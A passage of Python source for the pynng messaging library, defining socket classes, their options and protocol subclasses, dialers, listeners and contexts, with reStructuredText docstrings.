* :class:`Pair1`
* :class:`Req0` / :class:`Rep0`
* :class:`Pub0` / :class:`Sub0`
* :class:`Push0` / :class:`Pull0`
* :class:`Surveyor0` / :class:`Respondent0`
* :class:`Bus0`
The socket initializer receives no positional arguments. It accepts the
following keyword arguments, with the same meaning as the :ref:`attributes
<socket-attributes>` described below: ``recv_timeout``, ``send_timeout``,
``recv_buffer_size``, ``send_buffer_size``, ``reconnect_time_min``,
``reconnect_time_max``, and ``name``
To talk to another socket, you have to either :meth:`~Socket.dial`
its address, or :meth:`~Socket.listen` for connections. Then you can
:meth:`~Socket.send` to send data to the remote sockets or
:meth:`~Socket.recv` to receive data from the remote sockets.
Asynchronous versions are available as well, as :meth:`~Socket.asend`
and :meth:`~Socket.arecv`. The supported event loops are :mod:`asyncio`
and `Trio`_. You must ensure that you :meth:`~Socket.close` the socket
when you are finished with it. Sockets can also be used as a context
manager; this is the preferred way to use them when possible.
.. _socket-attributes:
Sockets have the following attributes. Generally, you should set these
attributes before :meth:`~Socket.listen`-ing or
:meth:`~Socket.dial`-ing, or by passing them in as keyword arguments
when creating the :class:`Socket`:
* **recv_timeout** (int): Receive timeout, in ms. If a socket takes longer
than the specified time, raises a ``pynng.exceptions.Timeout``.
Corresponds to library option ``NNG_OPT_RECVTIMEO``
* **send_timeout** (int): Send timeout, in ms. If the message cannot
be queued in the specified time, raises a pynng.exceptions.Timeout.
Corresponds to library option ``NNG_OPT_SENDTIMEO``.
* **recv_max_size** (int): The largest size of a message to receive.
Messages larger than this size will be silently dropped. A size of 0
indicates unlimited size. The default size is 1 MB.
* **recv_buffer_size** (int): The number of messages that the socket
will buffer on receive. Corresponds to ``NNG_OPT_RECVBUF``.
* **send_buffer_size** (int): The number of messages that the socket
will buffer on send. Corresponds to ``NNG_OPT_SENDBUF``.
* **name** (str): The socket name. Corresponds to
``NNG_OPT_SOCKNAME``. This is useful for debugging purposes.
* **raw** (bool): A boolean, indicating whether the socket is raw or cooked.
Returns ``True`` if the socket is raw, else ``False``. This property
is read-only. Corresponds to library option ``NNG_OPT_RAW``. For
more information see `nng's documentation.
<https://nanomsg.github.io/nng/man/v1.0.1/nng.7.html#raw_mode>`_
Note that currently, pynng does not support ``raw`` mode sockets, but
we intend to `in the future
<https://github.com/codypiersall/pynng/issues/35>`_:
* **protocol** (int): Read-only option which returns the 16-bit number
of the socket's protocol.
* **protocol_name** (str): Read-only option which returns the name of the
socket's protocol.
* **peer** (int): Returns the peer protocol id for the socket.
* **local_address**: The :class:`~pynng.sockaddr.SockAddr` representing
the local address. Corresponds to ``NNG_OPT_LOCADDR``.
* **reconnect_time_min** (int): The minimum time to wait before
attempting reconnects, in ms. Corresponds to ``NNG_OPT_RECONNMINT``.
This can also be overridden on the dialers.
* **reconnect_time_max** (int): The maximum time to wait before
attempting reconnects, in ms. Corresponds to ``NNG_OPT_RECONNMAXT``.
If this is non-zero, then the time between successive connection
attempts will start at the value of ``reconnect_time_min``, and grow
exponentially, until it reaches this value. This option can be set
on the socket, or on the dialers associated with the socket.
* **recv_fd** (int): The receive file descriptor associated with the
socket. This is suitable to be passed into poll functions like
:func:`select.poll` or :func:`select.select`. That is the only thing
this file descriptor is good for; do not attempt to read from or
write to it. The file descriptor will be marked as **readable**
whenever it can receive data without blocking. Corresponds to
``NNG_OPT_RECVFD``.
* **send_fd** (int): The sending file descriptor associated with the
socket. This is suitable to be passed into poll functions like
:func:`select.poll` or :func:`select.select`. That is the only thing
this file descriptor is good for; do not attempt to read from or
write to it. The file descriptor will be marked as **readable**
whenever it can send data without blocking. Corresponds to
``NNG_OPT_SENDFD``.
.. Note::
When used in :func:`select.poll` or :func:`select.select`,
``recv_fd`` and ``send_fd`` are both marked as **readable** when
they can receive or send data without blocking. So the upshot is
that for :func:`select.select` they should be passed in as the
*rlist* and for :meth:`select.poll.register` the *eventmask*
should be ``POLLIN``.
* **tls_config** (:class:`~pynng.TLSConfig`): The TLS configuration for
this socket. This option is only valid if the socket is using the
TLS transport. See :class:`~pynng.TLSConfig` for information about
the TLS configuration. Corresponds to ``NNG_OPT_TLS_CONFIG``. This
option is write-only.
.. _Trio: https://trio.readthedocs.io
"""
# TODO: Do we need to document ttl_max? We're not supporting nng_device
# yet, so I guess not?
# the following options correspond to nng options documented at
# https://nanomsg.github.io/nng/man/v1.0.1/nng_options.5.html
name = StringOption('socket-name')
raw = BooleanOption('raw')
protocol = IntOption('protocol')
protocol_name = StringOption('protocol-name')
peer = IntOption('peer')
peer_name = StringOption('peer-name')
recv_buffer_size = IntOption('recv-buffer')
send_buffer_size = IntOption('send-buffer')
recv_timeout = MsOption('recv-timeout')
send_timeout = MsOption('send-timeout')
ttl_max = IntOption('ttl-max')
recv_max_size = SizeOption('recv-size-max')
reconnect_time_min = MsOption('reconnect-time-min')
reconnect_time_max = MsOption('reconnect-time-max')
recv_fd = IntOption('recv-fd')
send_fd = IntOption('send-fd')
tcp_nodelay = BooleanOption('tcp-nodelay')
tcp_keepalive = BooleanOption('tcp-keepalive')
tls_config = PointerOption('tls-config')
def __init__(self, *,
dial=None,
listen=None,
recv_timeout=None,
send_timeout=None,
recv_buffer_size=None,
send_buffer_size=None,
recv_max_size=None,
reconnect_time_min=None,
reconnect_time_max=None,
opener=None,
block_on_dial=None,
name=None,
tls_config=None,
async_backend=None
):
# mapping of id: Python objects
self._dialers = {}
self._listeners = {}
self._pipes = {}
self._on_pre_pipe_add = []
self._on_post_pipe_add = []
self._on_post_pipe_remove = []
self._pipe_notify_lock = threading.Lock()
self._async_backend = async_backend
self._socket = ffi.new('nng_socket *',)
if opener is not None:
self._opener = opener
if opener is None and not hasattr(self, '_opener'):
raise TypeError('Cannot directly instantiate a Socket. Try a subclass.')
check_err(self._opener(self._socket))
if tls_config is not None:
self.tls_config = tls_config
if recv_timeout is not None:
self.recv_timeout = recv_timeout
if send_timeout is not None:
self.send_timeout = send_timeout
if recv_max_size is not None:
self.recv_max_size = recv_max_size
if reconnect_time_min is not None:
self.reconnect_time_min = reconnect_time_min
if reconnect_time_max is not None:
self.reconnect_time_max = reconnect_time_max
if recv_buffer_size is not None:
self.recv_buffer_size = recv_buffer_size
if send_buffer_size is not None:
self.send_buffer_size = send_buffer_size
if name is not None:
self.name = name
# set up pipe callbacks. This **must** be called before listen/dial to
# avoid race conditions.
handle = ffi.new_handle(self)
self._handle = handle
for event in (lib.NNG_PIPE_EV_ADD_PRE, lib.NNG_PIPE_EV_ADD_POST,
lib.NNG_PIPE_EV_REM_POST):
check_err(lib.nng_pipe_notify(
self.socket, event, lib._nng_pipe_cb, handle))
if listen is not None:
self.listen(listen)
if dial is not None:
self.dial(dial, block=block_on_dial)
def dial(self, address, *, block=None):
"""Dial the specified address.
Args:
address: The address to dial.
block: Whether to block or not. There are three possible values
this can take:
1. If ``True``, a blocking dial is attempted. If it fails for
any reason, the dial fails and an exception is raised.
2. If ``False``, a non-blocking dial is started. The dial is
retried periodically in the background until it is
successful.
3. (**Default behavior**): If ``None``, a blocking dial is
first attempted. If it fails an exception is logged (using
the Python logging module), then a non-blocking dial is
done.
"""
if block:
return self._dial(address, flags=0)
elif block is None:
try:
return self.dial(address, block=True)
except pynng.ConnectionRefused:
msg = 'Synchronous dial failed; attempting asynchronous now'
logger.exception(msg)
return self.dial(address, block=False)
else:
return self._dial(address, flags=lib.NNG_FLAG_NONBLOCK)
def _dial(self, address, flags=0):
"""Dial specified ``address``
``flags`` usually do not need to be given.
"""
dialer = ffi.new('nng_dialer *')
ret = lib.nng_dial(self.socket, to_char(address), dialer, flags)
check_err(ret)
# we can only get here if check_err doesn't raise
d_id = lib.nng_dialer_id(dialer[0])
py_dialer = Dialer(dialer, self)
self._dialers[d_id] = py_dialer
return py_dialer
def listen(self, address, flags=0):
"""Listen at specified address.
``listener`` and ``flags`` usually do not need to be given.
"""
listener = ffi.new('nng_listener *')
ret = lib.nng_listen(self.socket, to_char(address), listener, flags)
check_err(ret)
# we can only get here if check_err doesn't raise
l_id = lib.nng_listener_id(listener[0])
py_listener = Listener(listener, self)
self._listeners[l_id] = py_listener
return py_listener
def close(self):
"""Close the socket, freeing all system resources."""
# if a TypeError occurs (e.g. a bad keyword to __init__) we don't have
# the attribute _socket yet. This prevents spewing extra exceptions
if hasattr(self, '_socket'):
lib.nng_close(self.socket)
# cleanup the list of listeners/dialers. A program would be likely to
# segfault if a user accessed the listeners or dialers after this
# point.
self._listeners = {}
self._dialers = {}
def __del__(self):
self.close()
@property
def socket(self):
return self._socket[0]
def recv(self, block=True):
"""Receive data on the socket. If the request times out the exception
:class:`pynng.Timeout` is raised. If the socket cannot perform that
operation (e.g., a :class:`Pub0`, which can only
:meth:`~Socket.send`), the exception :class:`pynng.NotSupported`
is raised.
Args:
block: If block is True (the default), the function will not return
until the operation is completed or times out. If block is False,
the function will return data immediately. If no data is ready on
the socket, the function will raise ``pynng.TryAgain``.
"""
# TODO: someday we should support some kind of recv_into() operation
# where the user provides the data buffer.
flags = lib.NNG_FLAG_ALLOC
if not block:
flags |= lib.NNG_FLAG_NONBLOCK
data = ffi.new('char **')
size_t = ffi.new('size_t *')
ret = lib.nng_recv(self.socket, data, size_t, flags)
check_err(ret)
recvd = ffi.unpack(data[0], size_t[0])
lib.nng_free(data[0], size_t[0])
return recvd
def send(self, data, block=True):
"""Sends ``data`` on socket.
Args:
data: either ``bytes`` or ``bytearray``
block: If block is True (the default), the function will
not return until the operation is completed or times out.
If block is False, the function will raise ``pynng.TryAgain``
immediately if no data was sent.
"""
_ensure_can_send(data)
flags = 0
if not block:
flags |= lib.NNG_FLAG_NONBLOCK
err = lib.nng_send(self.socket, data, len(data), flags)
check_err(err)
async def arecv(self):
"""The asynchronous version of :meth:`~Socket.recv`"""
with _aio.AIOHelper(self, self._async_backend) as aio:
return await aio.arecv()
async def asend(self, data):
"""Asynchronous version of :meth:`~Socket.send`."""
_ensure_can_send(data)
with _aio.AIOHelper(self, self._async_backend) as aio:
return await aio.asend(data)
def __enter__(self):
return self
def __exit__(self, *tb_info):
self.close()
@property
def dialers(self):
"""A list of the active dialers"""
return tuple(self._dialers.values())
@property
def listeners(self):
"""A list of the active listeners"""
return tuple(self._listeners.values())
@property
def pipes(self):
"""A list of the active pipes"""
return tuple(self._pipes.values())
def _add_pipe(self, lib_pipe):
# this is only called inside the pipe callback.
pipe_id = lib.nng_pipe_id(lib_pipe)
# If the pipe already exists in the Socket, don't create a new one
if pipe_id not in self._pipes:
pipe = Pipe(lib_pipe, self)
self._pipes[pipe_id] = pipe
return self._pipes[pipe_id]
def _remove_pipe(self, lib_pipe):
pipe_id = lib.nng_pipe_id(lib_pipe)
del self._pipes[pipe_id]
def new_context(self):
"""Return a new :class:`Context` for this socket."""
return Context(self)
def add_pre_pipe_connect_cb(self, callback):
"""
Add a callback which will be called before a Pipe is connected to a
Socket. You can add as many callbacks as you want, and they will be
called in the order they were added.
The callback provided must accept a single argument: a Pipe. The
socket associated with the pipe can be accessed through the pipe's
``socket`` attribute. If the pipe is closed, the callbacks for
post_pipe_connect and post_pipe_remove will not be called.
"""
self._on_pre_pipe_add.append(callback)
def add_post_pipe_connect_cb(self, callback):
"""
Add a callback which will be called after a Pipe is connected to a
Socket. You can add as many callbacks as you want, and they will be
called in the order they were added.
The callback provided must accept a single argument: a :class:`Pipe`.
"""
self._on_post_pipe_add.append(callback)
def add_post_pipe_remove_cb(self, callback):
"""
Add a callback which will be called after a Pipe is removed from a
Socket. You can add as many callbacks as you want, and they will be
called in the order they were added.
The callback provided must accept a single argument: a :class:`Pipe`.
"""
self._on_post_pipe_remove.append(callback)
def remove_pre_pipe_connect_cb(self, callback):
"""Remove ``callback`` from the list of callbacks for pre pipe connect
events
"""
self._on_pre_pipe_add.remove(callback)
def remove_post_pipe_connect_cb(self, callback):
"""Remove ``callback`` from the list of callbacks for post pipe connect
events
"""
self._on_post_pipe_add.remove(callback)
def remove_post_pipe_remove_cb(self, callback):
"""Remove ``callback`` from the list of callbacks for post pipe remove
events
"""
self._on_post_pipe_remove.remove(callback)
def _try_associate_msg_with_pipe(self, msg):
""" Looks up the nng_msg associated with the ``msg`` and attempts to
set it on the Message ``msg``
"""
# Wrap pipe handling inside the notify lock since we can create
# a new Pipe and associate it with the Socket if the callbacks
# haven't been called yet. This will ensure there's no race
# condition with the pipe callbacks.
with self._pipe_notify_lock:
lib_pipe = lib.nng_msg_get_pipe(msg._nng_msg)
pipe_id = lib.nng_pipe_id(lib_pipe)
try:
msg.pipe = self._pipes[pipe_id]
except KeyError:
# A message may have been received before the pipe callback was called.
# Create a new Pipe and associate it with the Socket.
# When the callback is called, it will detect that the pipe was already.
# if pipe_id < 0, that *probably* means we hit a race where the
# associated pipe was closed.
if pipe_id >= 0:
# Add the pipe to the socket
msg.pipe = self._add_pipe(lib_pipe)
def recv_msg(self, block=True):
"""Receive a :class:`Message` on the socket."""
flags = 0
if not block:
flags |= lib.NNG_FLAG_NONBLOCK
msg_p = ffi.new('nng_msg **')
check_err(lib.nng_recvmsg(self.socket, msg_p, flags))
msg = msg_p[0]
msg = Message(msg)
self._try_associate_msg_with_pipe(msg)
return msg
def send_msg(self, msg, block=True):
"""Send the :class:`Message` ``msg`` on the socket.
.. Note::
It's may be more convenient to call :meth:`Pipe.send` than this
method.
"""
flags = 0
if not block:
flags |= lib.NNG_FLAG_NONBLOCK
with msg._mem_freed_lock:
msg._ensure_can_send()
check_err(lib.nng_sendmsg(self.socket, msg._nng_msg, flags))
msg._mem_freed = True
async def asend_msg(self, msg):
"""
Asynchronously send the :class:`Message` ``msg`` on the socket.
"""
with msg._mem_freed_lock:
msg._ensure_can_send()
with _aio.AIOHelper(self, self._async_backend) as aio:
# Note: the aio helper sets the _mem_freed flag on the msg
return await aio.asend_msg(msg)
async def arecv_msg(self):
"""
Asynchronously receive the :class:`Message` ``msg`` on the socket.
"""
with _aio.AIOHelper(self, self._async_backend) as aio:
msg = await aio.arecv_msg()
self._try_associate_msg_with_pipe(msg)
return msg
class Bus0(Socket):
"""A bus0 socket. The Python version of `nng_bus
<https://nanomsg.github.io/nng/man/tip/nng_bus.7>`_.
It accepts the same keyword arguments as :class:`Socket` and also has the
same :ref:`attributes <socket-attributes>`.
A :class:`Bus0` socket sends a message to all directly connected peers.
This enables creating mesh networks. Note that messages are only sent to
*directly* connected peers. You must explicitly connect all nodes with the
:meth:`~Socket.listen` and corresponding :meth:`~Socket.listen` calls.
Here is a demonstration of using the bus protocol:
.. literalinclude:: snippets/bus0_sync.py
:language: python3
"""
_opener = lib.nng_bus0_open
class Pair0(Socket):
"""A socket for bidrectional, one-to-one communication, with a single
partner. The Python version of `nng_pair0
<https://nanomsg.github.io/nng/man/tip/nng_pair.7>`_.
This is the most basic type of socket.
It accepts the same keyword arguments as :class:`Socket` and also has the
same :ref:`attributes <socket-attributes>`.
This demonstrates the synchronous API:
.. literalinclude:: snippets/pair0_sync.py
:language: python3
This demonstrates the asynchronous API using `Trio`_. Remember that
:mod:`asyncio` is also supported.
.. literalinclude:: snippets/pair0_async.py
:language: python3
"""
_opener = lib.nng_pair0_open
class Pair1(Socket):
"""A socket for bidrectional communication with potentially many peers.
The Python version of `nng_pair1
<https://nanomsg.github.io/nng/man/tip/nng_pair.7>`_.
It accepts the same keyword arguments as :class:`Socket` and also has the
same :ref:`attributes <socket-attributes>`. It also has one extra
keyword-only argument, ``polyamorous``, which must be set to ``True`` to
connect with more than one peer.
.. Warning::
If you want to connect to multiple peers you **must** pass
``polyamorous=True`` when you create your socket. ``polyamorous`` is a
read-only attribute of the socket and cannot be changed after creation.
.. Warning::
Pair1 was an experimental feature in nng, and is currently deprecated.
It will likely be removed in the future; see `nng's docs
<https://nng.nanomsg.org/man/v1.3.2/nng_pair_open.3.html>`_ for
details.
To get the benefits of polyamory, you need to use the methods that work
with :class:`Message` objects: :meth:`Socket.recv_msg` and
:meth:`Socket.arecv_msg` for receiving, and :meth:`Pipe.send`
and :meth:`Pipe.asend` for sending.
Here is an example of the synchronous API, where a single listener connects
to multiple peers. This is more complex than the :class:`Pair0` case,
because it requires to use the :class:`Pipe` and :class:`Message`
interfaces.
.. literalinclude:: snippets/pair1_sync.py
And here is an example using the async API, using `Trio`_.
.. literalinclude:: snippets/pair1_async.py
"""
def __init__(self, *, polyamorous=False, **kwargs):
# make sure we don't listen/dial before setting polyamorous, so we pop
# them out of kwargs, then do the dial/listen below.
# It's not beautiful, but it will work.
dial_addr = kwargs.pop('dial', None)
listen_addr = kwargs.pop('dial', None)
super().__init__(**kwargs)
if polyamorous:
self._opener = lib.nng_pair1_open_poly
else:
self._opener = lib.nng_pair1_open
# now we can do the listen/dial
if dial_addr is not None:
self.dial(dial_addr, block=kwargs.get('block_on_dial'))
if listen_addr is not None:
self.listen(listen_addr)
_opener = lib.nng_pair1_open_poly
polyamorous = BooleanOption('pair1:polyamorous')
class Push0(Socket):
"""A push0 socket.
The Python version of `nng_push
<https://nanomsg.github.io/nng/man/tip/nng_push.7>`_.
It accepts the same keyword arguments as :class:`Socket` and also
has the same :ref:`attributes <socket-attributes>`.
A :class:`Push0` socket is the pushing end of a data pipeline. Data sent
from a push socket will be sent to a *single* connected :class:`Pull0`
socket. This can be useful for distributing work to multiple nodes, for
example. Attempting to call :meth:`~Socket.recv()` on a Push0 socket
will raise a :class:`pynng.NotSupported` exception.
Here is an example of two :class:`Pull0` sockets connected to a
:class:`Push0` socket.
.. literalinclude:: snippets/pushpull_sync.py
"""
_opener = lib.nng_push0_open
class Pull0(Socket):
"""A pull0 socket.
The Python version of `nng_pull
<https://nanomsg.github.io/nng/man/tip/nng_pull.7>`_.
It accepts the same keyword arguments as :class:`Socket` and also
has the same :ref:`attributes <socket-attributes>`.
A :class:`Pull0` is the receiving end of a data pipeline. It needs to be
paired with a :class:`Push0` socket.
Attempting to :meth:`~Socket.send()`
with a Pull0 socket will raise a :class:`pynng.NotSupported` exception.
See :class:`Push0` for an example of push/pull in action.
"""
_opener = lib.nng_pull0_open
class Pub0(Socket):
"""A pub0 socket.
The Python version of `nng_pub
<https://nanomsg.github.io/nng/man/tip/nng_pub.7>`_.
It accepts the same keyword arguments as :class:`Socket` and also has the
same :ref:`attributes <socket-attributes>`. A :class:`Pub0` socket calls
:meth:`~Socket.send`, the data is published to all connected
:class:`subscribers <Sub0>`.
Attempting to :meth:`~Socket.recv` with a Pub0 socket will raise a
:class:`pynng.NotSupported` exception.
See docs for :class:`Sub0` for an example.
"""
_opener = lib.nng_pub0_open
class Sub0(Socket):
"""A sub0 socket.
The Python version of `nng_sub
<https://nanomsg.github.io/nng/man/tip/nng_sub.7>`_.
It accepts the same keyword arguments as :class:`Socket` and also
has the same :ref:`attributes <socket-attributes>`. It also has one
additional keyword argument: ``topics``. If ``topics`` is given, it must
be either a :class:`str`, :class:`bytes`, or an iterable of str and bytes.
A subscriber must :meth:`~Sub0.subscribe` to specific topics, and only
messages that match the topic will be received. A subscriber can subscribe
to as many topics as you want it to.
A match is determined if the message starts with one of the subscribed
topics. So if the subscribing socket is subscribed to the topic
``b'hel'``, then the messages ``b'hel'``, ``b'help him`` and ``b'hello'``
would match, but the message ``b'hexagon'`` would not. Subscribing to an
empty string (``b''``) means that all messages will match. If a sub socket
is not subscribed to any topics, no messages will be receieved.
.. Note ::
pub/sub is a "best effort" transport; if you have a very high volume of
messages be prepared for some messages to be silently dropped.
Attempting to :meth:`~Socket.send` with a Sub0 socket will raise a
:class:`pynng.NotSupported` exception.
The following example demonstrates a basic usage of pub/sub:
.. literalinclude:: snippets/pubsub_sync.py
"""
_opener = lib.nng_sub0_open
def __init__(self, *, topics=None, **kwargs):
super().__init__(**kwargs)
if topics is None:
return
# special-case str/bytes
if isinstance(topics, (str, bytes)):
topics = [topics]
for topic in topics:
self.subscribe(topic)
def subscribe(self, topic):
"""Subscribe to the specified topic.
Topics are matched by looking at the first bytes of any received
message.
.. Note::
If you pass a :class:`str` as the ``topic``, it will be
automatically encoded with :meth:`str.encode`. If this is not the
desired behavior, just pass :class:`bytes` in as the topic.
"""
options._setopt_string(self, b'sub:subscribe', topic)
def unsubscribe(self, topic):
"""Unsubscribe to the specified topic.
.. Note::
If you pass a :class:`str` as the ``topic``, it will be
automatically encoded with :meth:`str.encode`. If this is not the
desired behavior, just pass :class:`bytes` in as the topic.
"""
options._setopt_string(self, b'sub:unsubscribe', topic)
class Req0(Socket):
"""A req0 socket.
The Python version of `nng_req
<https://nanomsg.github.io/nng/man/tip/nng_req.7>`_.
It accepts the same keyword arguments as :class:`Socket` and also
has the same :ref:`attributes <socket-attributes>`. It also has one extra
keyword-argument: ``resend_time``. ``resend_time`` corresponds to
``NNG_OPT_REQ_RESENDTIME``
A :class:`Req0` socket is paired with a :class:`Rep0` socket and together
they implement normal request/response behavior. the req socket
:meth:`send()s <Socket.send>` a request, the rep socket :meth:`recv()s
<Socket.recv>` it, the rep socket :meth:`send()s <Socket.Send>` a response,
and the req socket :meth:`recv()s <Socket.recv>` it.
If a req socket attempts to do a :meth:`~Socket.recv` without first doing a
:meth:`~Socket.send`, a :class:`pynng.BadState` exception is raised.
A :class:`Req0` socket supports opening multiple :class:`Contexts
<Context>` by calling :meth:`~Socket.new_context`. In this way a req
socket can have multiple outstanding requests to a single rep socket.
Without opening a :class:`Context`, the socket can only have a single
outstanding request at a time.
Here is an example demonstrating the request/response pattern.
.. literalinclude:: snippets/reqrep_sync.py
"""
resend_time = MsOption('req:resend-time')
_opener = lib.nng_req0_open
def __init__(self, *, resend_time=None, **kwargs):
super().__init__(**kwargs)
if resend_time is not None:
self.resend_time = resend_time
class Rep0(Socket):
"""A rep0 socket.
The Python version of `nng_rep
<https://nanomsg.github.io/nng/man/tip/nng_rep.7>`_.
It accepts the same keyword arguments as :class:`Socket` and also
has the same :ref:`attributes <socket-attributes>`.
A :class:`Rep0` socket along with a :class:`Req0` socket implement the
request/response pattern:
the req socket :meth:`send()s <Socket.send>` a
request, the rep socket :meth:`recv()s <Socket.recv>` it, the rep socket
:meth:`send()s <Socket.Send>` a response, and the req socket :meth:`recv()s
<Socket.recv>` it.
A :class:`Rep0` socket supports opening multiple :class:`Contexts
<Context>` by calling :meth:`~Socket.new_context`. In this way a rep
socket can service multiple requests at the same time. Without opening a
:class:`Context`, the rep socket can only service a single request at a
time.
See the documentation for :class:`Req0` for an example.
"""
_opener = lib.nng_rep0_open
class Surveyor0(Socket):
"""A surveyor0 socket.
The Python version of `nng_surveyor
<https://nanomsg.github.io/nng/man/tip/nng_surveyor.7>`_.
It accepts the same keyword arguments as :class:`Socket` and also
has the same :ref:`attributes <socket-attributes>`. It has one additional
attribute: ``survey_time``. ``survey_time`` sets the amount of time a
survey lasts.
:class:`Surveyor0` sockets work with :class:`Respondent0` sockets in the
survey pattern. In this pattern, a :class:`surveyor <Surveyor0>` sends a
message, and gives all :class:`respondents <Respondent0>` a chance to
chime in. The amount of time a survey is valid is set by the attribute
``survey_time``. ``survey_time`` is the time of a survey in milliseconds.
Here is an example:
.. literalinclude:: snippets/surveyor_sync.py
"""
_opener = lib.nng_surveyor0_open
survey_time = MsOption('surveyor:survey-time')
def __init__(self, *, survey_time=None, **kwargs):
super().__init__(**kwargs)
if survey_time is not None:
self.survey_time = survey_time
class Respondent0(Socket):
"""A respondent0 socket.
The Python version of `nng_respondent
<https://nanomsg.github.io/nng/man/tip/nng_respondent.7>`_.
It accepts the same keyword arguments as :class:`Socket` and also
has the same :ref:`attributes <socket-attributes>`. It accepts no
additional arguments and has no other attributes
:class:`Surveyor0` sockets work with :class:`Respondent0` sockets in the
survey pattern. In this pattern, a :class:`surveyor <Surveyor0>` sends a
message, and gives all :class:`respondents <Respondent0>` a chance to
chime in. The amount of time a survey is valid is set by the attribute
``survey_time``. ``survey_time`` is the time of a survey in milliseconds.
See :class:`Surveyor0` docs for an example.
"""
_opener = lib.nng_respondent0_open
class Dialer:
"""The Python version of `nng_dialer
<https://nanomsg.github.io/nng/man/tip/nng_dialer.5>`_. A
:class:`Dialer` is returned whenever :meth:`Socket.dial` is called. A list
of active dialers can be accessed via ``Socket.dialers``.
A :class:`Dialer` is associated with a single :class:`Socket`. The
associated socket can be accessed via the ``socket`` attribute. There is
no public constructor for creating a :class:`Dialer`
"""
local_address = SockAddrOption('local-address')
remote_address = SockAddrOption('remote-address')
reconnect_time_min = MsOption('reconnect-time-min')
reconnect_time_max = MsOption('reconnect-time-max')
recv_max_size = SizeOption('recv-size-max')
url = StringOption('url')
peer = IntOption('peer')
peer_name = StringOption('peer-name')
tcp_nodelay = BooleanOption('tcp-nodelay')
tcp_keepalive = BooleanOption('tcp-keepalive')
tls_config = PointerOption('tls-config')
tls_ca_file = StringOption('tls-ca-file')
tls_cert_key_file = StringOption('tls-cert-key-file')
tls_auth_mode = IntOption('tls-authmode')
tls_server_name = StringOption('tls-server-name')
def __init__(self, dialer, socket):
"""
Args:
dialer: the initialized `lib.nng_dialer`.
socket: The Socket associated with the dialer
"""
# I can't think of a reason you would need to directly instantiate this
# class
self._dialer = dialer
self.socket = socket
@property
def dialer(self):
return self._dialer[0]
def close(self):
"""
Close the dialer.
"""
lib.nng_dialer_close(self.dialer)
del self.socket._dialers[self.id]
@property
def id(self):
return lib.nng_dialer_id(self.dialer)
class Listener:
"""The Python version of `nng_listener
<https://nanomsg.github.io/nng/man/tip/nng_listener.5>`_. A
:class:`Listener` is returned whenever :meth:`Socket.listen` is called. A
list of active listeners can be accessed via ``Socket.listeners``.
A :class:`Listener` is associated with a single :class:`Socket`. The
associated socket can be accessed via the ``socket`` attribute. There is
no public constructor for creating a :class:`Listener`.
"""
local_address = SockAddrOption('local-address')
remote_address = SockAddrOption('remote-address')
reconnect_time_min = MsOption('reconnect-time-min')
reconnect_time_max = MsOption('reconnect-time-max')
recv_max_size = SizeOption('recv-size-max')
url = StringOption('url')
peer = IntOption('peer')
peer_name = StringOption('peer-name')
tcp_nodelay = BooleanOption('tcp-nodelay')
tcp_keepalive = BooleanOption('tcp-keepalive')
tls_config = PointerOption('tls-config')
tls_ca_file = StringOption('tls-ca-file')
tls_cert_key_file = StringOption('tls-cert-key-file')
tls_auth_mode = IntOption('tls-authmode')
tls_server_name = StringOption('tls-server-name')
def __init__(self, listener, socket):
"""
Args:
listener: the initialized `lib.nng_dialer`.
socket: The Socket associated with the dialer
"""
# I can't think of a reason you would need to directly instantiate this
# class
self._listener = listener
self.socket = socket
@property
def listener(self):
return self._listener[0]
def close(self):
"""
Close the listener.
"""
lib.nng_listener_close(self.listener)
del self.socket._listeners[self.id]
@property
def id(self):
return lib.nng_listener_id(self.listener)
class Context:
"""
This is the Python version of `nng_context
<https://nanomsg.github.io/nng/man/tip/nng_ctx.5.html>`_. The way to
create a :class:`Context` is by calling :meth:`Socket.new_context()`.
Contexts are valid for :class:`Req0` and :class:`Rep0` sockets; other
protocols do not support contexts.
Once you have a context, you just call :meth:`~Context.send` and
:meth:`~Context.recv` or the async equivalents as you would on a socket.
A "context" keeps track of a protocol's state for stateful protocols (like
REQ/REP). A context allows the same :class:`Socket` to be used for
multiple operations at the same time. For an example of the problem that
contexts are solving, see this snippet, **which does not use contexts**,
and does terrible things:
.. code-block:: python
# start a socket to service requests.
# HEY THIS IS EXAMPLE BAD CODE, SO DON'T TRY TO USE IT
# in fact it's so bad it causes a panic in nng right now (2019/02/09):
# see https://github.com/nanomsg/nng/issues/871
import pynng
import threading
def service_reqs(s):
while True:
data = s.recv()
s.send(b"I've got your response right here, pal!")
threads = []
with pynng.Rep0(listen='tcp://127.0.0.1:12345') as s:
for _ in range(10):
t = threading.Thread(target=service_reqs, args=[s], daemon=True)
t.start()
threads.append(t)
for thread in threads:
thread.join()
Contexts allow multiplexing a socket in a way that is safe. It removes one
of the biggest use cases for needing to use raw sockets.
Contexts cannot be instantiated directly; instead, create a
:class:`Socket`, and call the :meth:`~Socket.new_context` method.
"""
def __init__(self, socket):
# need to set attributes first, so that if anything goes wrong,
# __del__() doesn't throw an AttributeError
self._context = None
assert isinstance(socket, Socket)
self._socket = socket
self._context = ffi.new('nng_ctx *')
check_err(lib.nng_ctx_open(self._context, socket.socket))
assert lib.nng_ctx_id(self.context) != -1
async def arecv(self):
"""Asynchronously receive data using this context."""
with _aio.AIOHelper(self, self._socket._async_backend) as aio:
return await aio.arecv()
async def asend(self, data):
"""Asynchronously send data using this context."""
_ensure_can_send(data)
with _aio.AIOHelper(self, self._socket._async_backend) as aio:
return await aio.asend(data)
def recv_msg(self):
"""Synchronously receive a :class:`Message` using this context."""
aio_p = ffi.new('nng_aio **')
check_err(lib.nng_aio_alloc(aio_p, ffi.NULL, ffi.NULL))
aio = aio_p[0]
try:
check_err(lib.nng_ctx_recv(self.context, aio))
check_err(lib.nng_aio_wait(aio))
check_err(lib.nng_aio_result(aio))
nng_msg = lib.nng_aio_get_msg(aio)
msg = Message(nng_msg)
self._socket._try_associate_msg_with_pipe(msg)
finally:
lib.nng_aio_free(aio)
return msg
def recv(self):
"""Synchronously receive data on this context."""
msg = self.recv_msg()
return msg.bytes
def send_msg(self, msg):
"""Synchronously send the :class:`Message` ``msg`` on the context."""
with msg._mem_freed_lock:
msg._ensure_can_send()
aio_p = ffi.new('nng_aio **')
check_err(lib.nng_aio_alloc(aio_p, ffi.NULL, ffi.NULL))
aio = aio_p[0]
try:
check_err(lib.nng_aio_set_msg(aio, msg._nng_msg))
check_err(lib.nng_ctx_send(self.context, aio))
msg._mem_freed = True
check_err(lib.nng_aio_wait(aio))
check_err(lib.nng_aio_result(aio))
finally:
lib.nng_aio_free(aio)
def send(self, data):
"""
Synchronously send data on the context.
"""
_ensure_can_send(data)
msg = Message(data)
return self.send_msg(msg)
def close(self):
"""Close this context."""
ctx_err = 0
